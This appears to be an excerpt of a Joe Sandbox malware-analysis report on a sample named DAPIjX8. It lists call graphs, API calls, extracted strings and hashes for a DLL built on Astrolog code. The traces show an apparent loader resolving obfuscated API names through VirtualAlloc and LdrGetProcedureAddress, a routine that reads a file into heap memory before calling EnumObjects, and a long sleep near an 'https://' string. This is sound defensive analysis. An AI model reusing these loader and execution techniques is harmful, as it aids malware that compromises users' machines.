100101a0 25 API calls 144981->144985 144982 10011a00 93 API calls 144982->144985 144983 10041717 36 API calls 144983->144985 144984 1000f000 98 API calls 144984->144985 144985->144950 144985->144954 144985->144956 144985->144957 144985->144960 144985->144965 144985->144967 144985->144974 144985->144975 144985->144976 144985->144977 144985->144978 144985->144979 144985->144980 144985->144981 144985->144982 144985->144983 144985->144984 144986 1000fcd8 Sleep 144985->144986 144986->144985 144993 10041453 24 API calls 3 library calls 144987->144993 144989 100414d6 144994 100414e4 IsProcessorFeaturePresent 144989->144994 144991 100414e3 144992->144942 144993->144989 144995 100414f0 144994->144995 144998 10041309 144995->144998 144999 10041325 ___scrt_fastfail 144998->144999 145000 10041351 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 144999->145000 145001 10041422 ___scrt_fastfail 145000->145001 145004 10038bd3 145001->145004 145003 10041440 GetCurrentProcess TerminateProcess 145003->144991 145005 10038bdc 145004->145005 145006 10038bde 145004->145006 145005->145003 145007 10038c5e 145006->145007 145010 10038c22 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 145007->145010 145009 10038d41 145009->145003 145010->145009 145012 10020378 145011->145012 145013 1002037d 145011->145013 145017 10020580 6 API calls 145012->145017 145016 1000f100 222 API calls 145013->145016 145015 10020383 145016->145015 145017->145013 145018 6c6b5d24 145019 6c6b5d2f 145018->145019 145020 6c6b5d34 145018->145020 145032 6c6c0cc4 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 145019->145032 145024 6c6b5c2e 145020->145024 145023 6c6b5d42 145025 6c6b5c3a _doexit 145024->145025 145026 6c6b5cd7 _doexit 145025->145026 145029 6c6b5c87 ___DllMainCRTStartup 145025->145029 145033 6c6b5aca 145025->145033 145026->145023 145028 6c6b5aca ___DllMainCRTStartup 138 API calls 145028->145026 145029->145026 145030 6c6b5aca ___DllMainCRTStartup 138 API calls 145029->145030 145031 6c6b5cb7 145029->145031 145030->145031 145031->145026 145031->145028 145032->145020 145034 6c6b5ad6 _doexit 145033->145034 145035 6c6b5b58 145034->145035 145036 6c6b5ade 145034->145036 145037 6c6b5bb9 145035->145037 145038 6c6b5b5e 145035->145038 145083 6c6be3bd HeapCreate 145036->145083 145041 6c6b5bbe 145037->145041 145042 6c6b5c17 145037->145042 145049 6c6b5b7c 145038->145049 145053 6c6b5ae7 _doexit 145038->145053 145093 6c6b2e5f 61 API calls _doexit 145038->145093 145040 6c6b5ae3 145043 6c6b5aee 145040->145043 145040->145053 145097 6c6b8faa TlsGetValue TlsSetValue 145041->145097 145042->145053 145101 6c6b92ae 73 API calls __freefls@4 145042->145101 145084 6c6b9328 78 API calls 5 library calls 145043->145084 145045 6c6b5bc3 145098 6c6b7abf 61 API calls _calloc 145045->145098 145050 6c6b5b90 145049->145050 145094 6c6b779b 62 API calls _free 145049->145094 145096 6c6b5ba3 TlsFree __mtterm 145050->145096 145052 6c6b5af3 __RTC_Initialize 145056 6c6b5af7 145052->145056 145061 6c6b5b03 GetCommandLineA 145052->145061 145053->145029 145085 6c6be3db HeapDestroy 145056->145085 145057 6c6b5b86 145095 6c6b8ffb TlsFree 145057->145095 145060 6c6b5afc 145060->145053 145086 6c6c0a9d 66 API calls 2 library calls 145061->145086 145065 6c6b5b13 145087 6c6b7556 68 API calls __calloc_crt 145065->145087 145066 6c6b5bcf 145066->145053 145068 6c6b5c0b 145066->145068 145069 6c6b5bf4 145066->145069 145100 6c6b355f 61 API calls 2 library calls 145068->145100 145099 6c6b9038 61 API calls 4 library calls 145069->145099 145070 6c6b5b1d 145073 6c6b5b21 145070->145073 145089 6c6c09e2 89 API calls 3 library calls 145070->145089 145088 6c6b8ffb TlsFree 145073->145088 145075 6c6b5bfb GetCurrentThreadId 145075->145053 145077 6c6b5b2d 145078 6c6b5b41 145077->145078 145090 6c6c075d 88 API calls 6 library calls 145077->145090 145078->145060 145092 6c6b779b 62 API calls _free 145078->145092 145081 6c6b5b36 145081->145078 145091 6c6b2c5c 72 API calls 4 library calls 145081->145091 145083->145040 145084->145052 145085->145060 145086->145065 145087->145070 145089->145077 145090->145081 145091->145078 145092->145073 145093->145049 145094->145057 145096->145053 145097->145045 145098->145066 145099->145075 145100->145060 145101->145053 145102 6c63338c 145124 6c6d734c 145102->145124 145104 6c633398 CreateMutexA 145105 6c6333b1 GetLastError 145104->145105 145106 6c6333ab 145104->145106 145105->145106 145108 6c6333be 145105->145108 145125 6c6b2e33 145106->145125 145128 6c6c0ff1 145108->145128 145110 6c6333d6 145131 6c63329d GetModuleFileNameA 145110->145131 145112 6c6333fb 145112->145112 145113 6c633417 CreateThread CreateFileA GetFileSize 145112->145113 145133 6c6b1f6a 145113->145133 145175 6c63334b 145113->145175 145115 6c63346a ReadFile 145116 6c633491 FindCloseChangeNotification 145115->145116 145117 6c633481 CloseHandle 145115->145117 145119 6c6b1f6a 77 API calls 145116->145119 145118 6c633490 145117->145118 145118->145116 145120 6c6334a3 _memmove 145119->145120 145121 6c6334ba HeapCreate RtlAllocateHeap 145120->145121 145149 6c6ce020 145121->145149 145124->145104 145151 6c6b2cf3 61 API calls 2 library calls 145125->145151 145127 6c6b2e44 145127->145105 145129 6c6c101a 145128->145129 145130 6c6c1026 KiUserExceptionDispatcher 145128->145130 145129->145130 145130->145110 145132 6c6332b5 __cftoa_l 145131->145132 145132->145112 145136 6c6b5dbc _malloc 145133->145136 145135 6c6b5de0 145135->145115 145136->145135 145139 6c6b5de2 std::exception::exception 145136->145139 145152 6c6b37d0 145136->145152 145137 6c6b5e20 145167 6c6c0f00 61 API calls std::exception::operator= 145137->145167 145139->145137 145166 6c6bb484 71 API calls __cinit 145139->145166 145140 6c6b5e2a 145142 6c6c0ff1 __CxxThrowException@8 KiUserExceptionDispatcher 145140->145142 145143 6c6b5e3b IsDebuggerPresent 145142->145143 145168 6c6c103d 145143->145168 145146 6c6b5f09 SetUnhandledExceptionFilter UnhandledExceptionFilter 145147 6c6b5f2e GetCurrentProcess TerminateProcess 145146->145147 145148 6c6b5f26 __call_reportfault 145146->145148 145147->145115 145148->145147 145150 6c6334e1 GetDC EnumObjects 145149->145150 145151->145127 145153 6c6b384d _malloc 145152->145153 145161 6c6b37de _malloc 145152->145161 145174 6c6b6fbc 61 API calls __getptd_noexit 145153->145174 145156 6c6b380c RtlAllocateHeap 145157 6c6b3845 145156->145157 145156->145161 145157->145136 145159 6c6b37e9 145159->145161 145169 6c6bb831 61 API calls 2 library calls 145159->145169 145170 6c6bb682 61 API calls 7 library calls 145159->145170 145171 6c6b2b5e GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 145159->145171 145160 6c6b3839 145172 6c6b6fbc 61 API calls __getptd_noexit 145160->145172 145161->145156 145161->145159 145161->145160 145164 6c6b3837 145161->145164 145173 6c6b6fbc 61 API calls __getptd_noexit 145164->145173 145166->145137 145167->145140 145168->145146 145169->145159 145170->145159 145172->145164 145173->145157 145174->145157 145181 6c6332f1 RegisterClassA CreateWindowExA 145175->145181 145177 6c633358 145178 6c633376 GetMessageA 145177->145178 145179 6c633383 145178->145179 145180 6c633362 TranslateMessage DispatchMessageA 145178->145180 145180->145178 145181->145177
                                  APIs
                                  • GetNativeSystemInfo.KERNEL32(?), ref: 032FE4C2
                                  • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 032FE4F2
                                  • LdrGetProcedureAddress.NTDLL(00000000,?,00000000,?), ref: 032FE819
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3246679220.00000000032FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 032FE000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_32fe000_DAPIjX8.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressAllocInfoNativeProcedureSystemVirtual
                                  • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                  • API String ID: 2811151940-2899676511
                                  • Opcode ID: 15b3c3a1d8b5dafea4a93bb4805a509b4eeb6b1eaca912e0ae13e9403863b76d
                                  • Instruction ID: f3ce44117919a4aaeebe1312827f6a78fd2d2279a8ac2d1bbbd8e8c85bc44407
                                  • Opcode Fuzzy Hash: 15b3c3a1d8b5dafea4a93bb4805a509b4eeb6b1eaca912e0ae13e9403863b76d
                                  • Instruction Fuzzy Hash: CE626A715193868FD732CF24C840BABF7E5BF84704F09492DEAC987261E770A984CB56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247704451.000000006C631000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C630000, based on PE: true
                                  • Associated: 00000009.00000002.3247658291.000000006C630000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247950943.000000006C727000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247979957.000000006C729000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248027784.000000006C74D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248067369.000000006C74E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C750000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C753000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C758000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C760000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248260526.000000006C763000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_6c630000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: using Moshier eph.; $ trying Swiss Eph; $ using Moshier Eph; $ using Moshier eph.; $.;C:\Astrolog\$Chiron's ephemeris is restricted to JD %8.1f - JD %8.1f$Interpolated apsides are restricted to JD %8.1f - JD %8.1f$Pholus's ephemeris is restricted to JD %8.1f - JD %8.1f$`ul$`ul$barycentric Moshier positions are not supported.$de431.eph$illegal planet number %d.$sun: $xul
                                  • API String ID: 0-479338637
                                  • Opcode ID: 0d795ce6165ddc0bca363bba214ad7172459b4d9c4ef944fe305ac0c69c38d6d
                                  • Instruction ID: 22888b3f029e31ba0d13712bb82c97863ae1eab4445f67f659f101a77392cf91
                                  • Opcode Fuzzy Hash: 0d795ce6165ddc0bca363bba214ad7172459b4d9c4ef944fe305ac0c69c38d6d
                                  • Instruction Fuzzy Hash: 99823871904509DAEF309F24DC44BD97BB0EB4A328F544EE5E4A4A69C0DB31C9A4CF6E
                                  APIs
                                  • Sleep.KERNEL32(0001D4C0,?,00000000,?), ref: 1000F406
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: `$https://
                                  • API String ID: 3472027048-3356742408
                                  • Opcode ID: 8bdf530b9ea3ced8279571d6625b001ddbfa3540c5801337f33a91fe9c71cf8c
                                  • Instruction ID: d66631ddc7739b2df91dca4a1cd6bdde61ed29147cda0506061661c4489d8bb2
                                  • Opcode Fuzzy Hash: 8bdf530b9ea3ced8279571d6625b001ddbfa3540c5801337f33a91fe9c71cf8c
                                  • Instruction Fuzzy Hash: 3482E471D00258DFEB54CB64CC85BEDBBB2EF45344F10829CE049AB695DB78AB84CB61

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1557 6c631112-6c631121 call 6c6b24fa 1560 6c631123-6c63114c call 6c6b1f84 call 6c651814 call 6c6b2289 1557->1560 1561 6c631151-6c63115d 1557->1561 1560->1561 1563 6c6311d6-6c6311da 1561->1563 1564 6c63115f-6c631165 1561->1564 1567 6c6311e0-6c6311e6 1563->1567 1564->1563 1566 6c631167-6c631175 call 6c6b2289 1564->1566 1566->1563 1576 6c631177-6c63119a 1566->1576 1569 6c6311f8-6c63120a call 6c631009 1567->1569 1570 6c6311e8-6c6311f1 1567->1570 1577 6c63120f-6c631222 call 6c651ad3 1569->1577 1570->1569 1575 6c6311f3 call 6c6314a4 1570->1575 1575->1569 1580 6c6311a6-6c6311b4 call 6c6514fc 1576->1580 1581 6c63119c-6c6311a1 call 6c6514fc 1576->1581 1588 6c631224-6c631237 1577->1588 1589 6c631238-6c63123e 1577->1589 1592 6c6311c0-6c6311d4 call 6c6514fc 1580->1592 1593 6c6311b6-6c6311bb call 6c6514fc 1580->1593 1581->1580 1588->1589 1590 6c631240-6c631253 1589->1590 1591 6c631254-6c63125a 1589->1591 1590->1591 1595 6c63127e-6c631285 call 6c63f780 1591->1595 1596 6c63125c-6c63127b call 6c6bedb0 * 2 1591->1596 1592->1567 1593->1592 1603 6c63140b-6c63141a 1595->1603 1604 6c63128b-6c631291 1595->1604 1596->1595 1608 6c631433-6c631437 1603->1608 1609 6c63141c-6c631422 1603->1609 1606 6c6312a3-6c6312aa 1604->1606 1607 6c631293-6c63129d call 6c6514fc 1604->1607 1612 6c6312f9 1606->1612 1613 6c6312ac-6c6312f7 call 6c637259 call 6c637313 1606->1613 1607->1606 1615 6c631439-6c631451 call 6c6514fc 1608->1615 1616 6c63146d-6c631473 1608->1616 1609->1608 1614 6c631424-6c63142e call 6c6514fc 1609->1614 1622 6c6312fe-6c631304 1612->1622 1613->1622 1614->1567 1633 6c631453-6c631458 call 6c6514fc 1615->1633 1634 6c63145d-6c631467 call 6c6514fc 1615->1634 1620 6c631475 call 6c654c0a 1616->1620 1621 6c63147a-6c631489 call 6c6b2289 1616->1621 1620->1621 1644 6c631492-6c6314a3 call 6c6b1f75 1621->1644 1645 6c63148b-6c631491 call 6c6b28b7 1621->1645 1628 6c631306-6c63130d 1622->1628 1629 6c63131a-6c63132a 1622->1629 1628->1629 1637 6c63130f-6c631311 1628->1637 1631 6c631344 call 6c646e7c 1629->1631 1632 6c63132c-6c631332 1629->1632 1649 6c631349-6c63134f 1631->1649 1640 6c631334-6c63133a 1632->1640 1641 6c63133c-6c631342 1632->1641 1633->1634 1634->1616 1637->1629 1646 6c631313-6c631319 call 6c65070e 1637->1646 1640->1641 1640->1649 1641->1649 1645->1644 1646->1629 1654 6c631351-6c631356 call 6c6b174a 1649->1654 1655 6c63135b-6c631361 1649->1655 1664 6c6313ef-6c6313f5 1654->1664 1658 6c6313a3-6c6313b5 call 6c645698 1655->1658 1659 6c631363-6c63139e call 6c651ad3 1655->1659 1658->1664 1665 6c6313b7-6c6313ea 1658->1665 1659->1658 1664->1603 1666 6c6313f7-6c6313fe 1664->1666 1665->1664 1666->1603 1667 6c631400-6c631402 1666->1667 1667->1603 1668 6c631404-6c63140a call 6c65070e 1667->1668 1668->1603
                                  APIs
                                    • Part of subcall function 6C6B24FA: __fsopen.LIBCMT ref: 6C6B2507
                                  • _sprintf.LIBCMT ref: 6C631133
                                    • Part of subcall function 6C651814: _sprintf.LIBCMT ref: 6C65183B
                                    • Part of subcall function 6C651814: MessageBoxA.USER32(?,?,00000030), ref: 6C651850
                                  • _memset.LIBCMT ref: 6C631265
                                  • _memset.LIBCMT ref: 6C631276
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247704451.000000006C631000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C630000, based on PE: true
                                  • Associated: 00000009.00000002.3247658291.000000006C630000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247950943.000000006C727000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247979957.000000006C729000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248027784.000000006C74D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248067369.000000006C74E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C750000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C753000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C758000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C760000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248260526.000000006C763000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_6c630000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _memset_sprintf$Message__fsopen
                                  • String ID: <!--EndFragment-->$<!--StartFragment -->$ prl$</body></html>$</font></font>$<font face="Courier">$<html><body>$File %s can not be created.$Version:0.9StartHTML:00000094EndHTML:00010000StartFragment:00000129EndFragment:00010000
                                  • API String ID: 2973518034-3916398297
                                  • Opcode ID: 861a54cbba0082174a19c18b2f41fbaa27bd37af228ec303684dac54ab486217
                                  • Instruction ID: d16bd277927f866e79e22ffa7db0c0c287b66e2543ef52223484db7f0bebf1fd
                                  • Opcode Fuzzy Hash: 861a54cbba0082174a19c18b2f41fbaa27bd37af228ec303684dac54ab486217
                                  • Instruction Fuzzy Hash: 98915C72B09261DBEB00EFA5C48185477B5BB6B31C715A93FD2998BB40D770C884CB8E

                                  Control-flow Graph

                                  APIs
                                  • _malloc.LIBCMT ref: 6C6B5DD6
                                    • Part of subcall function 6C6B37D0: __FF_MSGBANNER.LIBCMT ref: 6C6B37E9
                                    • Part of subcall function 6C6B37D0: __NMSG_WRITE.LIBCMT ref: 6C6B37F0
                                    • Part of subcall function 6C6B37D0: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C6B7A8B,?,00000001,?,?,6C6B7F4A,00000018,6C722E78,0000000C,6C6B7FDA), ref: 6C6B3815
                                  • std::exception::exception.LIBCMT ref: 6C6B5E0B
                                  • std::exception::exception.LIBCMT ref: 6C6B5E25
                                  • __CxxThrowException@8.LIBCMT ref: 6C6B5E36
                                  • IsDebuggerPresent.KERNEL32 ref: 6C6B5EF7
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C6B5F0C
                                  • UnhandledExceptionFilter.KERNEL32(6C6DFF84), ref: 6C6B5F17
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 6C6B5F33
                                  • TerminateProcess.KERNEL32(00000000), ref: 6C6B5F3A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247704451.000000006C631000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C630000, based on PE: true
                                  • Associated: 00000009.00000002.3247658291.000000006C630000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247950943.000000006C727000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247979957.000000006C729000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248027784.000000006C74D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248067369.000000006C74E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C750000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C753000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C758000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C760000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248260526.000000006C763000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_6c630000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandledstd::exception::exception$AllocateCurrentDebuggerException@8HeapPresentTerminateThrow_malloc
                                  • String ID: 0ul
                                  • API String ID: 2175014196-3400794795
                                  • Opcode ID: 2f01deca6067671a730cf94fdb77d8e0ea8853db4e57351d5e718a3c6fc73463
                                  • Instruction ID: ca1bc915d665f9a690d708580310b8ff12817af40460ace125b424dfdd9b2f72
                                  • Opcode Fuzzy Hash: 2f01deca6067671a730cf94fdb77d8e0ea8853db4e57351d5e718a3c6fc73463
                                  • Instruction Fuzzy Hash: DF411AB9A002899FDB00DF65CC85A987BB5FB0A31CF90412AE80897B40EF709945CF5A

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 176 6c6547b5-6c6547e3 177 6c6547e5 176->177 178 6c6547ea-6c65480f call 6c6b1f84 176->178 177->178 181 6c654814-6c65481b 178->181 182 6c65481d-6c654828 181->182 183 6c65482a-6c65482e 181->183 186 6c65483f-6c654873 call 6c6b1f84 GetModuleFileNameA 182->186 184 6c654834-6c65483a 183->184 185 6c654a8f-6c654a91 183->185 184->186 187 6c654ac0-6c654ac7 185->187 188 6c654a93-6c654a97 185->188 196 6c654875-6c654879 186->196 197 6c65488d-6c654890 186->197 190 6c654ae9-6c654af9 call 6c6b1f75 187->190 193 6c654ac9-6c654ae6 call 6c6b1f84 call 6c6b28b7 187->193 188->190 191 6c654a99-6c654abe call 6c6b1f84 call 6c651814 188->191 191->190 193->190 196->196 201 6c65487b 196->201 202 6c654893-6c6548c0 call 6c6b1f84 call 6c6b24fa 197->202 203 6c654892 197->203 206 6c654883-6c65488b 201->206 202->187 216 6c6548c6-6c6548f4 call 6c6b1f84 call 6c6b24fa 202->216 203->202 206->197 212 6c65487d-6c654880 206->212 212->203 214 6c654882 212->214 214->206 216->187 221 6c6548fa 216->221 222 6c6548ff-6c654903 221->222 223 6c654905-6c654908 222->223 224 6c654941-6c65494a 222->224 223->224 226 6c65490a-6c65493b call 6c6b1f84 call 6c6b24fa 223->226 224->222 225 6c65494c-6c654979 call 6c6b1f84 call 6c6b330e 224->225 235 6c6549b7-6c6549c4 call 6c6b330e 225->235 236 6c65497b-6c65497e 225->236 226->187 226->224 242 6c6549c6-6c6549c9 235->242 243 6c654a02-6c654a0b call 6c6b330e 235->243 236->235 237 6c654980-6c6549b1 call 6c6b1f84 call 6c6b24fa 236->237 237->187 237->235 242->243 244 6c6549cb-6c6549fc call 6c6b1f84 call 6c6b24fa 242->244 251 6c654a45-6c654a6e call 6c6b1f84 call 6c6b24fa 243->251 252 6c654a0d-6c654a10 243->252 244->187 244->243 261 6c654a73-6c654a7a 251->261 252->251 254 6c654a12-6c654a43 call 6c6b1f84 call 6c6b24fa 252->254 254->187 254->251 261->187 263 6c654a7c-6c654a89 261->263 263->181 263->185
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247704451.000000006C631000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C630000, based on PE: true
                                  • Associated: 00000009.00000002.3247658291.000000006C630000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247950943.000000006C727000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247979957.000000006C729000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248027784.000000006C74D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248067369.000000006C74E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C750000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C753000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C758000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C760000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248260526.000000006C763000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_6c630000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _sprintf$__wgetenv$FileModuleName
                                  • String ID: %s%c%s$%s%s$%s.as$710$ASTR$ASTROLOG$C:\Astrolog$File '%s' not found.$r%s
                                  • API String ID: 2614078948-576927601
                                  • Opcode ID: cd478209d5c6f133f40534fab666b5e2bd37a262ba0718d1832129367a6e6d78
                                  • Instruction ID: ddadc2a458ba6ffccf44d2ff0a9d0c597f2972a7673365b61c9a68542e6f3af0
                                  • Opcode Fuzzy Hash: cd478209d5c6f133f40534fab666b5e2bd37a262ba0718d1832129367a6e6d78
                                  • Instruction Fuzzy Hash: C291B8F6800218ABDB11DA90CD84FDB77BC9F15304F5401D1E659A3941EBB4DAA8CF6C
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247704451.000000006C631000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C630000, based on PE: true
                                  • Associated: 00000009.00000002.3247658291.000000006C630000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247950943.000000006C727000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247979957.000000006C729000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248027784.000000006C74D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248067369.000000006C74E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C750000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C753000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C758000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C760000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248260526.000000006C763000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_6c630000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _sprintf$_free$_strncmp
                                  • String ID: .;C:\Astrolog\$99.$asteroid No. %d (%s): $asteroid eph. file (%s): $jd %f < lower limit %f;$jd %f > upper limit %f;$moon eph. file (%s): $plan. COB No. %d (%s): $plan. moon No. %d (%s): $planets eph. file (%s): $s.%s$se1
                                  • API String ID: 1187704711-3796515
                                  • Opcode ID: 87fe863f9737c2595cfee7874f30d447bf2abc0a303f1d4a19ccc0791ca452d9
                                  • Instruction ID: 7669bdf9f900371873f0a3459c7a0931a128dcfd76fbe25345377f55458fc171
                                  • Opcode Fuzzy Hash: 87fe863f9737c2595cfee7874f30d447bf2abc0a303f1d4a19ccc0791ca452d9
                                  • Instruction Fuzzy Hash: E7122A70904A09DBDB31CF24C9587DA77F4FF49308F2449DAE898A7950DB309E98CB68

                                  Control-flow Graph

                                  APIs
                                  • __EH_prolog3_catch_GS.LIBCMT ref: 6C633393
                                  • CreateMutexA.KERNEL32(00000000,00000000,MyProgramMutex,00000020), ref: 6C6333A1
                                  • GetLastError.KERNEL32 ref: 6C6333B1
                                  • __CxxThrowException@8.LIBCMT ref: 6C6333D1
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000334B,00000000,00000000,6C75A980), ref: 6C633433
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6C633451
